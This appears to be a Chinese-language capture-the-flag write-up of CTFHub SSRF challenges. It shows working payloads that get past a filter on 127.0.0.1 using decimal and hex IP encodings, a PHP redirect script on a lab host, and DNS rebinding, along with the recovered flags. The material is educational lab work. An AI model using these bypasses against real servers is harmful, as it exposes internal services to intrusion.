127.0.0.1

十进制:2130706433
十六进制 = 0x7F000001
  • 1
  • 2
  • 3
  • 4

payload:

?url=http://2130706433/flag.php
?url=http://0x7F000001/flag.php

ctfhub{6c7da22b915e514a2166ebc8}
  • 1
  • 2
  • 3
  • 4

302跳转 Bypass

SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

没有vps,在BUU开个靶机,然后在/var/www/html目录下创建ssrf.php

<?php 
header("Location: http://127.0.0.1/flag.php");
?>
  • 1
  • 2
  • 3

然后payload写访问文件的地址

?url=http://challenge-ecc5d8e674ef2aa4.sandbox.ctfhub.com:10800/?url=http://54899ba5-ce14-4afa-a744-c342f2cc5361.node4.buuoj.cn:81/ssrf.php

ctfhub{44d10798e3a02163751e39ee}
  • 1
  • 2
  • 3

DNS重绑定 Bypass

在这个网站注册一个账号http://ceye.io/,然后会给你分配一个域名,修改成如下的内容,第一个随便天填,第二个写

浅谈DNS重绑定漏洞:https://zhuanlan.zhihu.com/p/89426041

配置一下
在这里插入图片描述
然后使用域名

Payload:url=http://r.xxxxxx/flag.php  
#xxx为分给你的域名

ctfhub{89904fb53a36e3df04691243}
  • 1
  • 2
  • 3
  • 4

参考文章:
我在CTFHub学习SSRF
SSRF的利用方式

推荐阅读